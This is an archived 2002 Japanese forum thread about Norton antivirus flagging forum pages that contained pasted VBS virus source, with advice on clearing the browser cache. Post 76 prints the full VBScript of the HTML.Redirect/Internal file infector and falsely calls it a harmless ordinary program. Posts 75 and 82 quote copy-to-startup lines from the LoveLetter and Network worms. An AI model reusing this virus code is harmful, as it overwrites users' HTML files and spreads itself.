5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ノートンがvbsウィルスのソースに誤反応

1 :名無しさん@お腹いっぱい。:02/07/05 21:31
只今2chでvbsのウィルスのソースを貼り
ノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるので
このスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応
このスレで報告願えると幸いです。

基本(この問題について) >>2
既知の2chで話題になってるvbsソース >>3

2 :名無しさん@お腹いっぱい。:02/07/05 21:31
■この問題について■

2chのスレにvbsウィルスのソースを書き込むことによって
ブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたと
ノートン先生などが騒ぎます。(設定によっては反応しないことも
ありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されること
は無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダに
htmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
なので、まだ2chで話題に上がって無くても、Internet〜フォルダの
htmlファイルが感染したと警告が出た場合、同じ問題だと言えます。
(もちろん、全く問題無い)
これらのファイルは削除しても全く問題ありませんが、
該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされて
しまうので、警告が出ます。

3 :名無しさん@お腹いっぱい。:02/07/05 21:31
■既知のvbsウィルスのソース■

・VBS.Internal
出元はhttp://tmp.2ch.net/test/read.cgi/download/1025717301/
の197だと思われる。
ダウソ板からいろんな板へ飛び火した模様。

・VBS.LoveLetter.A
c.Copy(dirsystem&”LOVE−LETTER−FOR−YOU.TXT.vbs
(反応しないように全角で書いてあります)
出元不明。ニュー速から?

4 :名無しさん@お腹いっぱい。:02/07/05 21:32
糞スレすまそ。うざかったら沈んでもいいので
一応vbs絡みの質問等はココへ誘導してくれると幸いです。

5 :名無しさん@お腹いっぱい。:02/07/05 21:33
ご苦労様です。

6 :  :02/07/05 21:34
>>1
スレ立て乙カレー。

7 :名無しさん@お腹いっぱい。:02/07/05 21:38
でもノートン先生買ってから、一度もウイルス検出したこと無いんで
ちゃんと働いてるのか不安だったけど、動作して安心した。

8 :名無しさん@お腹いっぱい。:02/07/05 21:40
便りが無いのが良い便り

9 :大きなお世話かも知れないが:02/07/05 21:42
つけたし。

同様にA bone やかちゅ〜しゃなどのブラウザでノートンが反応した場合は

該当スレッドのログを削除する。こちらも同様に問題はないです。

10 :名無しさん@お腹いっぱい。:02/07/05 21:52
糞スレ立てんなボケ!!

11 :名無しさん@お腹いっぱい。:02/07/05 21:54
>>10 いや、隔離スレッドありがたいです。

12 :名無しさん@お腹いっぱい。:02/07/05 21:57
まあ立たなくて済めばそれに越したことは無いのだが・・・。

13 :名無しさん@お腹いっぱい。:02/07/05 22:03

この問題だけじゃないじゃん もっとたくさんおご反応を書けるよ。

だからクソなんぢゃお。

14 :名無しさん@お腹いっぱい。:02/07/05 22:08
何いってるかわからんけど。
質問スレにこの手の問題が急に増えたから
隔離スレが立ったんだろ
それで、>>2に説明が載ってるから
新しいvbsソース(もしくは普通のウィルスのバイナリ)貼り付けが出ても。
同じように対処できるしここへ誘導すれば答えてくれる人もいるだろう。
って意味合いのスレだと思うけど。

この問題だけじゃないから隔離スレたったんだと思うけど、
どういう意味のレスなの?日本語で書いてけろ。

15 :名無しさん@お腹いっぱい。:02/07/05 22:23
ダウソ板発
VBS.Network.E
どこのスレかまだ不明

16 :名無しさん@お腹いっぱい。:02/07/05 22:26
>>15
http://tmp.2ch.net/test/read.cgi/download/1024930771/545
これちゃうか?

17 :名無しさん@お腹いっぱい。:02/07/05 22:31
>>16
サンクス!多分それだな。

18 :名無しさん@お腹いっぱい。:02/07/05 22:35
この問題で、検疫されたInternet Temporary Filesの中のものを
削除した場合Internet Temporary Filesが正常に動作しない
可能性などもあるのでしょうか?

19 :名無しさん@お腹いっぱい。:02/07/05 22:38
ない。

20 :名無しさん@お腹いっぱい。:02/07/05 22:40
>Internet Temporary Filesが正常に動作しない
これ意味分からんのだが

当然キャッシュしなおさないけなくはなるよ。

21 :名無しさん@お腹いっぱい。:02/07/05 22:40
>>18
全く問題ないです。
「Temporary」という言葉が示しているように、あくまでも
一時的に作るファイルなので、消しても困りません。

22 :18:02/07/05 22:46
>>19-21
親切にありがとうございます

削除した後にキャッシュし直しという事を
しなくてはいけないって事ですか?

23 :名無しさん@お腹いっぱい。:02/07/05 22:49
ブラウザでhtml表示するためには
ネットから一旦tenpフォルダにダウソせなあかんのね。
そうしないと見れんの。
だからそのファイル消して二度とそのスレ開かなければ
もう反応することはないけど、消した後もう一回そのスレ開いたら
キャッシュしなおすから、またノートン先生が騒ぐって事。
だからInternet~フォルダの感染は気にしない事を推奨。

24 :名無しさん@お腹いっぱい。:02/07/05 22:49
sageれ

25 : :02/07/05 22:50
VBS.Freelink.B
ダウソ板トップ

26 :名無しさん@お腹いっぱい。:02/07/05 22:50
>>22
キャッシュは見ただけで貯まっていくので、特別することはないです。

27 :18:02/07/05 22:53
>>23
>>26
分かりました、ありがとうございます

28 :名無しさん@お腹いっぱい。:02/07/05 22:53
探しにいったけど見つからないや・・

29 :名無しさん@お腹いっぱい。:02/07/05 23:00
農豚ないからわからんが、>>25のは
http://tmp.2ch.net/test/read.cgi/download/1025877007/
の12かな。

30 :名無しさん@お腹いっぱい。:02/07/05 23:01
A Bone では、ログ保存フォルダを「除外」に設定すればよいと思。

31 :名無しさん@お腹いっぱい。:02/07/05 23:03
それぞれのログデータをテキストエディタで開いて、
該当部分を削って保存すれば良いだろう。

データ整合性までチェックしてなければ、の話だが。

32 :25:02/07/05 23:04
>>29
ちがうよ。それ開いたら、VBS.Internalでました。

25は、トップで出ました。

33 :名無しさん@お腹いっぱい。:02/07/05 23:05
>>31
それ2chブラウザみたいなさ
差分だけ取得するようなのだといいけど
IEのキャッシュって、一致しなかったら丸読み直しじゃないの?

34 :29:02/07/05 23:06
あれ。それInternalか。
ばーっと見てきたけどみつかんねーなあ。

35 :名無しさん@お腹いっぱい。:02/07/05 23:09
2ちゃんブラウザでみてるなら、
>>30のとおりにやればいいのでは?

36 :名無しさん@お腹いっぱい。:02/07/05 23:09
http://corn.2ch.net/test/read.cgi/news/1025851382/l50
これにノートンが反応した。
びっくらこいたけど、このスレ見て安心しますた。

37 : :02/07/05 23:11
初めてノートンが働きました、
うれしてす

38 :名無しさん@お腹いっぱい。:02/07/05 23:11
>>33
キャッシュだと読み直し、あぼーんしてもらうしかない罠。

VBSなんちゃらはvbsで検索すれば見つかる。

39 :名無しさん@お腹いっぱい。:02/07/05 23:11
36はらヴれたーだな。

40 :名無しさん@お腹いっぱい。:02/07/05 23:13
>>29

つーか、ここの沈んでるスレに
全部はってあると思うよ。
昔はやった奴だから。


41 :名無しさん@お腹いっぱい。:02/07/05 23:28
あれ、俺の反応しねえや、なんでだろ?

42 :41:02/07/05 23:31
>>41
ああ、ログ保存するの忘れてたわ、スマソ

43 :名無しさん@お腹いっぱい。:02/07/05 23:37
かちゅで該当レス番透明あぼーんでいいのかな

44 :名無しさん@お腹いっぱい。:02/07/05 23:39
透明じゃなくても良いけどね。

45 :名無しさん@お腹いっぱい。:02/07/05 23:47
かちゅしてません。
ノートンが削除できないと言ってます。
自力で削除するしかないのでしょうか?
やりかたがわかりませぇぇぇんんん〜〜〜(号泣
どうかどうか教えてください!

46 :名無しさん@お腹いっぱい。:02/07/05 23:48
まず>>2は読んだのか小一時間・・・

47 :名無しさん@お腹いっぱい。:02/07/05 23:52
>>2の内容はレベルが高すぎて、ほぼわかりません。
みなさんが「あぼーん」とか仰っているので
消せるものならわたしも消したいとぉ〜(T.T)

48 :名無しさん@お腹いっぱい。:02/07/05 23:56
>>47
>全く問題ありません
これだけわかればいいよ。

49 :名無しさん@お腹いっぱい。:02/07/05 23:57
>>47
ツール→インターネットオプション→ファイルの削除

50 :名無しさん@お腹いっぱい。:02/07/05 23:57
>>1さん、どもです。
少し前、マンキン食らって懲りたつもりが、
「マタかよ!!」と思った矢先にこのスレがあってよかった。
あせってて日本語おかしいですが・・・

51 :名無しさん@お腹いっぱい。:02/07/05 23:59
>>48
でも、これからノートンで毎日チェックする度に
「ウィルスが見つかったが削除はできんぞ」って言われちゃうんですよね?
憂鬱すぎますぅ〜。消したいです〜。


52 :名無しさん@お腹いっぱい。:02/07/06 00:00
その口調をなんとかして欲しいですぅ〜。
とりあえず>>49を試して欲しいですぅ〜。

53 :名無しさん@お腹いっぱい。:02/07/06 00:01
IEだと反応してゾヌだと反応しないのはなぜ?

54 :名無しさん@お腹いっぱい。:02/07/06 00:03
意味不明

55 :名無しさん@お腹いっぱい。:02/07/06 00:03
常時監視してるのってIEだけなんじゃない?
それはヘルプ見ればのってると思うけど。
でも結局、ログに落としてしまえばIEのキャッシュでも
ゾヌのログにも反応するからね。(あとでスキャンかけた場合

56 :名無しさん@お腹いっぱい。:02/07/06 00:03
>>49
わわ、ありがとうです!
全てのオフラインコンテンツも削除しますか?

57 :名無しさん@お腹いっぱい。:02/07/06 00:03
>>53
ゾヌだとhtmlファイルがキャッシュとしてローカルに保存されないから。

58 :名無しさん@お腹いっぱい。:02/07/06 00:04
ゾヌって2chブラウザのホットゾヌのことでしょ?

59 :名無しさん@お腹いっぱい。:02/07/06 00:04
>>56
しない。

60 :名無しさん@お腹いっぱい。:02/07/06 00:05
前から疑問だったけど、「全てのオフラインコンテンツ」ってなに?

61 :名無しさん@お腹いっぱい。:02/07/06 00:07
>>59
再び、ありがとうです!
よかった(TT

62 :名無しさん@お腹いっぱい。:02/07/06 00:09
>>60
お気に入りのページのコンテンツを何階層か指定して
全部DLしてオフラインで見れるようにできるんだけど。
他に使いやすいそゆソフトがいぱいあるのであまり使わない。

63 :名無しさん@お腹いっぱい。:02/07/06 00:10
つかブロードバンドのこの時代にね。常時接続が普通だし。あんま必要ない

64 :名無しさん@お腹いっぱい。:02/07/06 00:11
貧乏ネットで電話代節約するために一気に落としといて、接続切ってから見るオフラインブラウズという技がある。

65 :当方プレインストール版マカフィー・・・:02/07/06 00:16
逆に考えると、ウイルスコード見てウイルス対策ソフトが反応しないのは、
当方のセキュリティレベルに問題が有るということですか?

66 :名無しさん@お腹いっぱい。:02/07/06 00:18
普通htmlやtxtやlogはチェックする意味が殆ど無いから普通だと思うが

67 :名無しさん@お腹いっぱい。:02/07/06 00:21
>>65
ノーdがソースの<と&lt;を同じ物として認識してしまってる感じ。
&lt;なら問題無いと思われ

68 :名無しさん@お腹いっぱい。:02/07/06 00:23
<や>がエスケープされているからウィルスとして動作するはずが無い。
検出しないほうが正しいといえる。

69 :名無しさん@お腹いっぱい。:02/07/06 00:25
ノートン5なんですけど、赤い画面になった時どれを選べばいいのでしょうか?
取り敢えず[S]中止を選んでみたのですが、なんか続行してるような。

70 :名無しさん@お腹いっぱい。:02/07/06 00:28
>>55
常時監視しているのってIEだけなの?
じゃあ、IE以外で接続している時ってウィルス入られっぱなしってことにならない?

それから、このソース書き込みにバスターやバカフィは反応しないのだろうか?

71 :名無しさん@お腹いっぱい。:02/07/06 00:30
A Boneでラブレターフォーユーの記載されているログ取得してみたが
NAVが反応しないな。>>16>>29のリンクは反応したけど。

いや、ただそれだけなんだけど。


72 :65:02/07/06 00:31
レスありがとうございます。
PC初心者板のウイルス対策スレで、
マカフィーは叩かれまくっているので少し心配だったんですが、
問題ないみたいですね。


73 :名無しさん@お腹いっぱい。:02/07/06 00:33
>>70
ノートンのバグ
だから、反応しようがしまいが、
”誤認識”なんだから

> じゃあ、IE以外で接続している時ってウィルス入られっぱなしってことにならない?

心配無用
以上


74 :名無しさん@お腹いっぱい。:02/07/06 00:40
>>70
じゃあ農豚使ってない人はウィルスいれられっぱなしなのかよ。
そんなバカな話は無くて
Internet Temporary Filesに↓されるファイルまで常時検索するから
今回のような問題がおきたわけだが、
通常ここにはhtmlとかjpgとかgifとかmidとかしかないわけ。
確実にウィルスが実行可能でないファイル形式について
常時検索されても全く持って無駄だから。
そもそも常時スキャン機能自体無駄だと言えてしまうんだけどね。

75 :名無しさん@お腹いっぱい。:02/07/06 00:44
fso.copyfile ”c:¥network.vbs”, ”j:¥windows¥start menu¥programs¥startup¥”

76 :名無しさん@お腹いっぱい。:02/07/06 00:46
これはウィルスではなく、FileSystemObjectを使った一般的なプログラムなんだが、
これをウィルス呼ばわりしてプログラム制作者の名誉を傷つけるとは、
ノートンってのは、とんでもない悪質なプログラムだな。
<BODY Onload="Redirect();">
<script language="VBScript"><!--

Sub Redirect
Randomize
If location.protocol = "file:" AND (Int((6 * Rnd) + 1) = 1) then Call Offline
location.href = location.href +"l"
End Sub

Sub Offline
Dim FSO,folder ,fc, f1, cpath
Set FSO = CreateObject("Scripting.FileSystemObject")
HostPath = Replace(location.href, "file:///", "")
HostPath = Replace(HostPath, "/", "\")
cpath = fso.GetParentFolderName(HostPath)
Set folder = fso.GetFolder(cpath)

While folder.IsRootFolder = false
Set folder = fso.GetFolder(cpath)
Set fc = folder.Files
cpath = fso.GetParentFolderName(cpath)
For each f1 in fc
s = Lcase(Fso.GetExtensionName(f1.name))
If s = "htm" and fso.FileExists(f1.path+"l") = False then
fso.CopyFile f1.path, f1.path+"l", true
fso.CopyFile HostPath, f1.path, true
End If
Next
Wend
If (Int((10 * Rnd) + 1) + 1) = 1 Then MsgBox("HTML.Redirect /1nternal")
End Sub
--></script>
</BODY>

77 : :02/07/06 00:47
>>75
どーでもいいが字面がすごくマヌケに見える

78 :名無しさん@お腹いっぱい。:02/07/06 00:50
セキュリティ板自体が・・・

79 :名無しさん@お腹いっぱい。:02/07/06 00:51
>>76は何て反応するんだ?

80 :名無しさん@お腹いっぱい。:02/07/06 00:56
このスレにソース書くときはどこかしら全角にして欲しい、
一々ノートンが反応してセキュ板来る度に警告警告で…

81 :名無しさん@お腹いっぱい。:02/07/06 00:58
>>79
http://www.symantec.co.jp/region/jp/sarcj/cgi-bin/virauto.cgi?vid=33700
コレ

82 :オモロイ:02/07/06 01:00
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"

If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l", truefso.CopyFile HostPath, f1.path, trueEnd IfNext

c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")



83 :名無しさん@お腹いっぱい。:02/07/06 01:00
したらばじゃ反応しないのは俺だけかな?

http://www.shitaraba.com/

84 :名無しさん@お腹いっぱい。:02/07/06 01:01
あ、ゾヌ使用ですけど、今このスレ開いたらノートン先生が反応しました。(;´Д`)
>>74
ノートンや、他のアンチウィルス使ってなかったら入られっ放しじゃないの?
htmlとか常時検索されるのがウザかったら、設定で除外にもできるが。
でも、デフォルトで検索するようになってるんだよね。

85 :名無しさん@お腹いっぱい。:02/07/06 01:01
>>81
サンクス。
ってInternalかよっ!

86 :名無しさん@お腹いっぱい。:02/07/06 01:06
>>84
だからさ。
自分が手動で降ろす実行可能ファイル(exeとか)は
信頼できる鯖以外から落とさないってのが大原則で。
勝手に自動でDLされるhtmlやらjpegやらはウィルスが
居ないわけで。
漏れはあんちヴぃーるすのソフトなんかは一切買ってなくて
月1程度Antidoteフリー版とオンラインスキャン一応してるけど
感染した事ないよ。


87 :名無しさん@お腹いっぱい。:02/07/06 01:23
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5の
chiri[1]って奴が何か反応するんだけど、大丈夫だよな?

88 :名無しさん@お腹いっぱい。:02/07/06 01:25
>>87
それヤヴァイよ
駆除できないでしょ?

89 :名無しさん@お腹いっぱい。:02/07/06 01:26
>>86
html開いた瞬間に感染するウィルス→Nimuda

90 :名無しさん@お腹いっぱい。:02/07/06 01:26
>>87
Content.IE5はIEのキャッシュだが

91 :名無しさん@お腹いっぱい。:02/07/06 01:27
>>88
出来ないけど、どうすりゃいいの?

92 :名無しさん@お腹いっぱい。:02/07/06 01:28
>>89
そりゃ穴だべ。
穴埋めはせっせとしてるよ。
てか、IEの未知の穴を農豚くんだと止めてくれるわけじゃなかろ?
(あたりめーか)

93 :名無しさん@お腹いっぱい。:02/07/06 01:30
消したいだけなら、
ツール>インターネットオプション>ファイルの削除>ローカル〜にチェック>削除
で消せそうだが、駆除になるかはウィルスによる

94 : :02/07/06 01:30
ウィルスは穴突いて感染するんだろが

95 :名無しさん@お腹いっぱい。:02/07/06 01:30
>>92
M$からパッチが出るまでの間だけなら

96 :名無しさん@お腹いっぱい。:02/07/06 01:32
かちゅだけどこのスレを閉じたとき警告が出る悪寒

97 :名無しさん@お腹いっぱい。:02/07/06 01:32
>>89
アクティブスクリプトを許可していなければDLしない
ファイルのダウンロードを許可していなければDLしない
DLした後にWMPが起動しなかったら感染しない

html開いた瞬間に感染するウィルスではない

98 :名無しさん@お腹いっぱい。:02/07/06 01:34
htmlは呼び出しているだけか、
そうするとhtmlは検索対象から外して良いって事?

99 :名無しさん@お腹いっぱい。:02/07/06 01:34
>ウィルスは穴突いて感染するんだろが
どこをどう間違うとそうなる?ワームのことか?

100 :名無しさん@お腹いっぱい。:02/07/06 01:35
>>93
やっと消せた、本当にありがたい。
これの為に約3時間も食ってしまった。
ところで、これってマンキンと違って実害は無よね?
あと、反応したファイルを駆除しても問題無いよね?

193 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)